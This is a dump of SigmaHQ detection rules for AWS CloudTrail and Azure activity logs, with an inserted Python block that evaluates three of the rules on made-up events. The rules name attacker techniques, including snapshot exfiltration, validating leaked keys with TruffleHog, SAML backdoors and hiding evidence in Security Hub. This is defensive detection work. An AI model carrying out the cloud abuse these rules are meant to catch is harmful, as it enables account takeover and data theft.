    "path": "rules/cloud/aws/cloudtrail/aws_root_account_usage.yml",
    "content": "title: AWS Root Credentials\nid: 8ad1600d-e9dc-4251-b0ee-a65268f29add\nstatus: test\ndescription: Detects AWS root account usage\nreferences:\n    - https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html\nauthor: vitaliy0x1\ndate: 2020-01-21\nmodified: 2022-10-09\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.persistence\n    - attack.t1078.004\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection_usertype:\n        userIdentity.type: Root\n    selection_eventtype:\n        eventType: AwsServiceEvent\n    condition: selection_usertype and not selection_eventtype\nfalsepositives:\n    - AWS Tasks That Require AWS Account Root User Credentials https://docs.aws.amazon.com/general/latest/gr/aws_tasks-that-require-root.html\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_route_53_domain_transferred_lock_disabled.yml",
    "content": "title: AWS Route 53 Domain Transfer Lock Disabled\nid: 3940b5f1-3f46-44aa-b746-ebe615b879e0\nstatus: test\ndescription: Detects when a transfer lock was removed from a Route 53 domain. It is recommended to refrain from performing this action unless intending to transfer the domain to a different registrar.\nreferences:\n    - https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml\n    - https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html\n    - https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html\nauthor: Elastic, Austin Songer @austinsonger\ndate: 2021-07-22\nmodified: 2022-10-09\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.credential-access\n    - attack.t1098\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: route53.amazonaws.com\n        eventName: DisableDomainTransferLock\n    condition: selection\nfalsepositives:\n    - A domain transfer lock may be disabled by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Activity from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: low\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_route_53_domain_transferred_to_another_account.yml",
    "content": "title: AWS Route 53 Domain Transferred to Another Account\nid: b056de1a-6e6e-4e40-a67e-97c9808cf41b\nstatus: test\ndescription: Detects when a request has been made to transfer a Route 53 domain to another AWS account.\nreferences:\n    - https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml\nauthor: Elastic, Austin Songer @austinsonger\ndate: 2021-07-22\nmodified: 2022-10-09\ntags:\n    - attack.persistence\n    - attack.credential-access\n    - attack.privilege-escalation\n    - attack.t1098\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: route53.amazonaws.com\n        eventName: TransferDomainToAnotherAwsAccount\n    condition: selection\nfalsepositives:\n    - A domain may be transferred to another AWS account by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Domain transfers from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: low\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_s3_data_management_tampering.yml",
    "content": "title: AWS S3 Data Management Tampering\nid: 78b3756a-7804-4ef7-8555-7b9024a02e2d\nstatus: test\ndescription: Detects changes to S3 data management settings in Amazon Web Services, namely bucket logging, static website hosting, default encryption, lifecycle and replication configuration, and object replication or restore requests.\nreferences:\n    - https://github.com/elastic/detection-rules/pull/1145/files\n    - https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html\n    - https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html\n    - https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketWebsite.html\n    - https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketEncryption.html\n    - https://docs.aws.amazon.com/AmazonS3/latest/userguide/setting-repl-config-perm-overview.html\n    - https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html\nauthor: Austin Songer @austinsonger\ndate: 2021-07-24\nmodified: 2022-10-09\ntags:\n    - attack.exfiltration\n    - attack.t1537\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: s3.amazonaws.com\n        eventName:\n            - PutBucketLogging\n            - PutBucketWebsite\n            - PutEncryptionConfiguration\n            - PutLifecycleConfiguration\n            - PutReplicationConfiguration\n            - ReplicateObject\n            - RestoreObject\n    condition: selection\nfalsepositives:\n    - An S3 configuration change may be made by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. S3 configuration changes from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: low\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_securityhub_finding_evasion.yml",
    "content": "title: AWS SecurityHub Findings Evasion\nid: a607e1fe-74bf-4440-a3ec-b059b9103157\nstatus: stable\ndescription: Detects the modification or deletion of findings and insights in AWS SecurityHub, which an attacker can use to hide evidence of their activity.\nreferences:\n    - https://docs.aws.amazon.com/cli/latest/reference/securityhub/\nauthor: Sittikorn S\ndate: 2021-06-28\ntags:\n    - attack.defense-evasion\n    - attack.t1562\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: securityhub.amazonaws.com\n        eventName:\n            - 'BatchUpdateFindings'\n            - 'DeleteInsight'\n            - 'UpdateFindings'\n            - 'UpdateInsight'\n    condition: selection\nfalsepositives:\n    - System or network administrator behavior\n    - DEV, UAT and SAT environments. Apply this rule to the PROD environment only.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_snapshot_backup_exfiltration.yml",
    "content": "title: AWS Snapshot Backup Exfiltration\nid: abae8fec-57bd-4f87-aff6-6e3db989843d\nstatus: test\ndescription: Detects the modification of an EC2 snapshot's permissions to enable access from another account\nreferences:\n    - https://www.justice.gov/file/1080281/download\nauthor: Darin Smith\ndate: 2021-05-17\nmodified: 2021-08-19\ntags:\n    - attack.exfiltration\n    - attack.t1537\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection_source:\n        eventSource: ec2.amazonaws.com\n        eventName: ModifySnapshotAttribute\n    condition: selection_source\nfalsepositives:\n    - Valid change to a snapshot's permissions\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_sso_idp_change.yml",
    "content": "title: AWS Identity Center Identity Provider Change\nid: d3adb3ef-b7e7-4003-9092-1924c797db35\nstatus: test\ndescription: |\n    Detects a change in the AWS Identity Center (FKA AWS SSO) identity provider.\n    A change in identity provider allows an attacker to establish persistent access or escalate privileges via user impersonation.\nreferences:\n    - https://docs.aws.amazon.com/singlesignon/latest/userguide/app-enablement.html\n    - https://docs.aws.amazon.com/singlesignon/latest/userguide/sso-info-in-cloudtrail.html\n    - https://docs.aws.amazon.com/service-authorization/latest/reference/list_awsiamidentitycentersuccessortoawssinglesign-on.html\nauthor: Michael McIntyre @wtfender\ndate: 2023-09-27\ntags:\n    - attack.persistence\n    - attack.credential-access\n    - attack.defense-evasion\n    - attack.t1556\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource:\n            - 'sso-directory.amazonaws.com'\n            - 'sso.amazonaws.com'\n        eventName:\n            - 'AssociateDirectory'\n            - 'DisableExternalIdPConfigurationForDirectory'\n            - 'DisassociateDirectory'\n            - 'EnableExternalIdPConfigurationForDirectory'\n    condition: selection\nfalsepositives:\n    - Authorized changes to the AWS account's identity provider\nlevel: high\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_sts_assumerole_misuse.yml",
    "content": "title: AWS STS AssumeRole Misuse\nid: 905d389b-b853-46d0-9d3d-dea0d3a3cd49\nstatus: test\ndescription: Identifies activity performed with AssumeRole-issued credentials, i.e. any CloudTrail event whose caller identity is an assumed role. Attackers could use role assumption to move laterally and escalate privileges.\nreferences:\n    - https://github.com/elastic/detection-rules/pull/1214\n    - https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html\nauthor: Austin Songer @austinsonger\ndate: 2021-07-24\nmodified: 2022-10-09\ntags:\n    - attack.lateral-movement\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1548\n    - attack.t1550\n    - attack.t1550.001\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        userIdentity.type: AssumedRole\n        userIdentity.sessionContext.sessionIssuer.type: Role\n    condition: selection\nfalsepositives:\n    - AssumeRole may be used by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - AssumeRole from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\n    - Automated processes that use Terraform may lead to false positives.\nlevel: low\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_sts_getcalleridentity_trufflehog.yml",
    "content": "title: AWS STS GetCallerIdentity Enumeration Via TruffleHog\nid: 9b1b8e9b-0a5d-4af1-9d2f-4c4b6e7c2c9d\nstatus: experimental\ndescription: |\n    Detects the use of TruffleHog for AWS credential validation by identifying GetCallerIdentity API calls where the userAgent indicates TruffleHog.\n    Threat actors leverage TruffleHog to enumerate and validate exposed AWS keys.\n    Successful exploitation allows threat actors to confirm the validity of compromised AWS credentials, facilitating further unauthorized access and actions within the AWS environment.\nreferences:\n    - https://www.rapid7.com/blog/post/tr-crimson-collective-a-new-threat-group-observed-operating-in-the-cloud/\n    - https://docs.aws.amazon.com/STS/latest/APIReference/API_GetCallerIdentity.html\n    - https://github.com/trufflesecurity/trufflehog\nauthor: Adan Alvarez @adanalvarez\ndate: 2025-10-12\ntags:\n    - attack.discovery\n    - attack.t1087.004\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: 'sts.amazonaws.com'\n        eventName: 'GetCallerIdentity'\n        userAgent|contains: 'TruffleHog'\n    condition: selection\nfalsepositives:\n    - Legitimate internal security scanning or key validation that intentionally uses TruffleHog. Authorize and filter known scanner roles, IP ranges, or assumed roles as needed.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_sts_getsessiontoken_misuse.yml",
    "content": "title: AWS STS GetSessionToken Misuse\nid: b45ab1d2-712f-4f01-a751-df3826969807\nstatus: test\ndescription: Identifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges.\nreferences:\n    - https://github.com/elastic/detection-rules/pull/1213\n    - https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html\nauthor: Austin Songer @austinsonger\ndate: 2021-07-24\nmodified: 2022-10-09\ntags:\n    - attack.lateral-movement\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1548\n    - attack.t1550\n    - attack.t1550.001\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: sts.amazonaws.com\n        eventName: GetSessionToken\n        userIdentity.type: IAMUser\n    condition: selection\nfalsepositives:\n    - GetSessionToken may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. GetSessionToken from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: low\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_susp_saml_activity.yml",
    "content": "title: AWS Suspicious SAML Activity\nid: f43f5d2f-3f2a-4cc8-b1af-81fde7dbaf0e\nstatus: test\ndescription: Identifies SAML-related activity in AWS, namely role assumption with a SAML assertion (AssumeRoleWithSAML) or an update to a SAML identity provider (UpdateSAMLProvider). An adversary who controls the SAML provider configuration could gain backdoor access to the account.\nreferences:\n    - https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateSAMLProvider.html\n    - https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithSAML.html\nauthor: Austin Songer\ndate: 2021-09-22\nmodified: 2022-12-18\ntags:\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.lateral-movement\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1078\n    - attack.t1548\n    - attack.t1550\n    - attack.t1550.001\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection_sts:\n        eventSource: 'sts.amazonaws.com'\n        eventName: 'AssumeRoleWithSAML'\n    selection_iam:\n        eventSource: 'iam.amazonaws.com'\n        eventName: 'UpdateSAMLProvider'\n    condition: 1 of selection_*\nfalsepositives:\n    - Automated processes that use Terraform may lead to false positives.\n    - The SAML provider could be updated by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - SAML provider updates from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_update_login_profile.yml",
    "content": "title: AWS User Login Profile Was Modified\nid: 055fb148-60f8-462d-ad16-26926ce050f1\nstatus: test\ndescription: |\n    Detects activity when someone is changing passwords on behalf of other users.\n    An attacker with the \"iam:UpdateLoginProfile\" permission on other users can change the password used to login to the AWS console on any user that already has a login profile setup.\nreferences:\n    - https://github.com/RhinoSecurityLabs/AWS-IAM-Privilege-Escalation\nauthor: toffeebr33k\ndate: 2021-08-09\nmodified: 2024-04-26\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1098\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: 'iam.amazonaws.com'\n        eventName: 'UpdateLoginProfile'\n    filter_main_user_identity:\n        userIdentity.arn|fieldref: requestParameters.userName\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate user account administration\nlevel: high\n"
  },
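Added example (not part of the SigmaHQ repository or of any rule above): a small Python evaluator for the subset of Sigma used by three of the CloudTrail rules in this section, run over constructed CloudTrail-style events. It covers the `userAgent|contains` match from the TruffleHog rule, the `1 of selection_*` condition from the SAML rule, and the `fieldref` filter from the login-profile rule directly above. As written, a plain `fieldref` compares the full `userIdentity.arn` string with the bare `requestParameters.userName`, so the filter never suppresses a user resetting their own password; the block also runs a `fieldref|endswith` variant, which is my assumption about the intended semantics and not the page's text, to show the difference. Rule titles are kept from the page; the account ID, user names and events are made up.

```python
"""Added example (not SigmaHQ code): evaluate three CloudTrail Sigma rules from this
section against constructed events. Supports only the Sigma subset they use: exact
and list matches, the contains/endswith modifiers, fieldref (compare with another
field of the same event) and the conditions 'selection', '1 of selection_*' and
'selection and not 1 of filter_main_*'. Rules are dicts, so no YAML library is needed."""
import fnmatch

RULES = {
    "AWS STS GetCallerIdentity Enumeration Via TruffleHog": {
        "selection": {"eventSource": "sts.amazonaws.com", "eventName": "GetCallerIdentity",
                      "userAgent|contains": "TruffleHog"},
        "condition": "selection",
    },
    "AWS Suspicious SAML Activity": {
        "selection_sts": {"eventSource": "sts.amazonaws.com", "eventName": "AssumeRoleWithSAML"},
        "selection_iam": {"eventSource": "iam.amazonaws.com", "eventName": "UpdateSAMLProvider"},
        "condition": "1 of selection_*",
    },
    "AWS User Login Profile Was Modified": {
        "selection": {"eventSource": "iam.amazonaws.com", "eventName": "UpdateLoginProfile"},
        # As on the page: plain fieldref compares the whole ARN with the bare user name.
        "filter_main_user_identity": {"userIdentity.arn|fieldref": "requestParameters.userName"},
        "condition": "selection and not 1 of filter_main_*",
    },
}
# Assumed variant (not on the page): suffix-match the ARN against the target user
# name so that a user changing their own password is filtered out.
LOGIN_PROFILE_ENDSWITH = {
    "selection": RULES["AWS User Login Profile Was Modified"]["selection"],
    "filter_main_user_identity": {"userIdentity.arn|fieldref|endswith": "requestParameters.userName"},
    "condition": "selection and not 1 of filter_main_*",
}

def get_field(event, dotted):
    """Resolve a dotted Sigma field name such as userIdentity.arn in a nested event."""
    cur = event
    for part in dotted.split("."):
        if not isinstance(cur, dict) or part not in cur:
            return None
        cur = cur[part]
    return cur

def match_item(event, key, expected):
    """Evaluate one 'field|modifier...: value(s)' line; list values are OR-ed."""
    field, *mods = key.split("|")
    actual = get_field(event, field)
    if actual is None:
        return False
    actual = str(actual)
    values = expected if isinstance(expected, list) else [expected]
    if "fieldref" in mods:  # the value names another field; compare with its content
        values = [str(v) for v in (get_field(event, ref) for ref in values) if v is not None]
    if "contains" in mods:
        return any(v in actual for v in values)
    if "endswith" in mods:
        return any(actual.endswith(v) for v in values)
    return actual in values

def match_selection(event, selection):
    """Every item of a selection map must match (Sigma AND semantics)."""
    return all(match_item(event, k, v) for k, v in selection.items())

def one_of(event, detection, pattern):
    """'1 of <glob>': at least one selection whose name matches the glob."""
    names = fnmatch.filter([n for n in detection if n != "condition"], pattern)
    return any(match_selection(event, detection[n]) for n in names)

def evaluate(event, detection):
    """Evaluate the three condition shapes used by the rules above."""
    cond = detection["condition"]
    if " and not 1 of " in cond:
        base, pattern = cond.split(" and not 1 of ")
        return match_selection(event, detection[base]) and not one_of(event, detection, pattern)
    if cond.startswith("1 of "):
        return one_of(event, detection, cond[len("1 of "):])
    return match_selection(event, detection[cond])

# Constructed CloudTrail-style events (not real logs), reduced to the fields the rules read.
USER = "arn:aws:iam::111122223333:user/"
EVENTS = {
    "trufflehog_check": {"eventSource": "sts.amazonaws.com", "eventName": "GetCallerIdentity",
                         "userAgent": "TruffleHog", "userIdentity": {"arn": USER + "ci-deploy"}},
    "cli_check": {"eventSource": "sts.amazonaws.com", "eventName": "GetCallerIdentity",
                  "userAgent": "aws-cli/2.15.0", "userIdentity": {"arn": USER + "alice"}},
    "saml_provider_update": {"eventSource": "iam.amazonaws.com", "eventName": "UpdateSAMLProvider",
                             "userIdentity": {"arn": USER + "alice"}},
    "alice_resets_bob": {"eventSource": "iam.amazonaws.com", "eventName": "UpdateLoginProfile",
                         "userIdentity": {"arn": USER + "alice"}, "requestParameters": {"userName": "bob"}},
    "alice_resets_self": {"eventSource": "iam.amazonaws.com", "eventName": "UpdateLoginProfile",
                          "userIdentity": {"arn": USER + "alice"}, "requestParameters": {"userName": "alice"}},
}

def run(rules=RULES, events=EVENTS):
    """Return {event name: [titles of the rules that fired]}."""
    return {name: [title for title, det in rules.items() if evaluate(ev, det)]
            for name, ev in events.items()}

if __name__ == "__main__":
    for name, hits in run().items():
        print(f"{name:21s} -> {hits or 'no match'}")
    print("self-service change, endswith filter:", run({"variant": LOGIN_PROFILE_ENDSWITH})["alice_resets_self"])
```

Running the script prints which rule fires for each constructed event: the TruffleHog user agent and the SAML provider update each hit one rule, the aws-cli check hits none, and both UpdateLoginProfile events fire under the literal filter, while only the cross-user reset fires under the suffix variant. The suffix match is deliberately loose (the name alice is also a suffix of malice), so a production rule should compare against a normalized principal name rather than a bare user-name suffix.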
  {
    "path": "rules/cloud/azure/activity_logs/azure_aadhybridhealth_adfs_new_server.yml",
    "content": "title: Azure Active Directory Hybrid Health AD FS New Server\nid: 288a39fc-4914-4831-9ada-270e9dc12cb4\nstatus: test\ndescription: |\n    This detection uses azureactivity logs (Administrative category) to identify the creation or update of a server instance in an Azure AD Hybrid health AD FS service.\n    A threat actor can create a new AD Health ADFS service and create a fake server instance to spoof AD FS signing logs. There is no need to compromise an on-prem AD FS server.\n    This can be done programmatically via HTTP requests to Azure.\nreferences:\n    - https://o365blog.com/post/hybridhealthagent/\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC\ndate: 2021-08-26\nmodified: 2023-10-11\ntags:\n    - attack.defense-evasion\n    - attack.t1578\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        CategoryValue: 'Administrative'\n        ResourceProviderValue: 'Microsoft.ADHybridHealthService'\n        ResourceId|contains: 'AdFederationService'\n        OperationNameValue: 'Microsoft.ADHybridHealthService/services/servicemembers/action'\n    condition: selection\nfalsepositives:\n    - Legitimate AD FS servers added to an AAD Health AD FS service instance\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_aadhybridhealth_adfs_service_delete.yml",
    "content": "title: Azure Active Directory Hybrid Health AD FS Service Delete\nid: 48739819-8230-4ee3-a8ea-e0289d1fb0ff\nstatus: test\ndescription: |\n    This detection uses azureactivity logs (Administrative category) to identify the deletion of an Azure AD Hybrid health AD FS service instance in a tenant.\n    A threat actor can create a new AD Health ADFS service and create a fake server to spoof AD FS signing logs.\n    The health AD FS service can then be deleted once it is no longer needed via HTTP requests to Azure.\nreferences:\n    - https://o365blog.com/post/hybridhealthagent/\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC\ndate: 2021-08-26\nmodified: 2023-10-11\ntags:\n    - attack.defense-evasion\n    - attack.t1578.003\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        CategoryValue: 'Administrative'\n        ResourceProviderValue: 'Microsoft.ADHybridHealthService'\n        ResourceId|contains: 'AdFederationService'\n        OperationNameValue: 'Microsoft.ADHybridHealthService/services/delete'\n    condition: selection\nfalsepositives:\n    - Legitimate AAD Health AD FS service instances being deleted in a tenant\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_ad_user_added_to_admin_role.yml",
    "content": "title: User Added to an Administrator's Azure AD Role\nid: ebbeb024-5b1d-4e16-9c0c-917f86c708a7\nstatus: test\ndescription: Detects when a user is added to an Azure AD role whose name ends in Admins or Administrator.\nreferences:\n    - https://m365internals.com/2021/07/13/what-ive-learned-from-doing-a-year-of-cloud-forensics-in-azure-ad/\nauthor: Raphaël CALVET, @MetallicHack\ndate: 2021-10-04\nmodified: 2022-10-09\ntags:\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1098.003\n    - attack.t1078\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        Operation: 'Add member to role.'\n        Workload: 'AzureActiveDirectory'\n        ModifiedProperties{}.NewValue|endswith:\n            - 'Admins'\n            - 'Administrator'\n    condition: selection\nfalsepositives:\n    - PIM (Privileged Identity Management) generates this event each time an eligible role is activated.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_application_deleted.yml",
    "content": "title: Azure Application Deleted\nid: 410d2a41-1e6d-452f-85e5-abdd8257a823\nstatus: test\ndescription: Identifies when an application is deleted in Azure.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#application-proxy\nauthor: Austin Songer @austinsonger\ndate: 2021-09-03\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.impact\n    - attack.t1489\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        properties.message:\n            - Delete application\n            - Hard Delete application\n    condition: selection\nfalsepositives:\n    - An application may be deleted by a system administrator.\n    - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Applications deleted by unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_application_gateway_modified_or_deleted.yml",
    "content": "title: Azure Application Gateway Modified or Deleted\nid: ad87d14e-7599-4633-ba81-aeb60cfe8cd6\nstatus: test\ndescription: Identifies when an application gateway is modified or deleted.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations\nauthor: Austin Songer\ndate: 2021-08-16\nmodified: 2022-08-23\ntags:\n    - attack.impact\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName:\n            - MICROSOFT.NETWORK/APPLICATIONGATEWAYS/WRITE\n            - MICROSOFT.NETWORK/APPLICATIONGATEWAYS/DELETE\n    condition: selection\nfalsepositives:\n    - An application gateway may be modified or deleted by a system administrator.\n    - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Application gateways modified or deleted by unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_application_security_group_modified_or_deleted.yml",
    "content": "title: Azure Application Security Group Modified or Deleted\nid: 835747f1-9329-40b5-9cc3-97d465754ce6\nstatus: test\ndescription: Identifies when an application security group is modified or deleted.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations\nauthor: Austin Songer\ndate: 2021-08-16\nmodified: 2022-08-23\ntags:\n    - attack.impact\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName:\n            - MICROSOFT.NETWORK/APPLICATIONSECURITYGROUPS/WRITE\n            - MICROSOFT.NETWORK/APPLICATIONSECURITYGROUPS/DELETE\n    condition: selection\nfalsepositives:\n    - An application security group may be modified or deleted by a system administrator.\n    - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Application security groups modified or deleted by unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_container_registry_created_or_deleted.yml",
    "content": "title: Azure Container Registry Created or Deleted\nid: 93e0ef48-37c8-49ed-a02c-038aab23628e\nstatus: test\ndescription: Detects when a Container Registry is created or deleted.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes\n    - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/\n    - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/\n    - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1\nauthor: Austin Songer @austinsonger\ndate: 2021-08-07\nmodified: 2022-08-23\ntags:\n    - attack.impact\n    - attack.t1485\n    - attack.t1496\n    - attack.t1489\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName:\n            - MICROSOFT.CONTAINERREGISTRY/REGISTRIES/WRITE\n            - MICROSOFT.CONTAINERREGISTRY/REGISTRIES/DELETE\n    condition: selection\nfalsepositives:\n    - Container Registry being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Container Registry created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: low\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_creating_number_of_resources_detection.yml",
    "content": "title: Number Of Resource Creation Or Deployment Activities\nid: d2d901db-7a75-45a1-bc39-0cbf00812192\nstatus: test\ndescription: Detects VM creation or resource deployment activities in Azure via the azureactivity log. The referenced Sentinel query alerts on an anomalous number of such activities; this rule matches each one, so the count threshold must be applied in the backend.\nreferences:\n    - https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Creating_Anomalous_Number_Of_Resources_detection.yaml\nauthor: sawwinnnaung\ndate: 2020-05-07\nmodified: 2023-10-11\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1098\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    keywords:\n        - Microsoft.Compute/virtualMachines/write\n        - Microsoft.Resources/deployments/write\n    condition: keywords\nfalsepositives:\n    - Valid change\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_device_no_longer_managed_or_compliant.yml",
    "content": "title: Azure Device No Longer Managed or Compliant\nid: 542b9912-c01f-4e3f-89a8-014c48cdca7d\nstatus: test\ndescription: Identifies when a device in Azure is no longer managed or compliant.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#core-directory\nauthor: Austin Songer @austinsonger\ndate: 2021-09-03\nmodified: 2022-10-09\ntags:\n    - attack.impact\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        properties.message:\n            - Device no longer compliant\n            - Device no longer managed\n    condition: selection\nfalsepositives:\n    - An administrator may have forgotten to review the device.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_device_or_configuration_modified_or_deleted.yml",
    "content": "title: Azure Device or Configuration Modified or Deleted\nid: 46530378-f9db-4af9-a9e5-889c177d3881\nstatus: test\ndescription: Identifies when a device or device configuration in Azure is modified or deleted.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#core-directory\nauthor: Austin Songer @austinsonger\ndate: 2021-09-03\nmodified: 2022-10-09\ntags:\n    - attack.impact\n    - attack.t1485\n    - attack.t1565.001\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        properties.message:\n            - Delete device\n            - Delete device configuration\n            - Update device\n            - Update device configuration\n    condition: selection\nfalsepositives:\n    - A device or device configuration may be modified or deleted by a system administrator.\n    - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Devices or device configurations modified or deleted by unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_dns_zone_modified_or_deleted.yml",
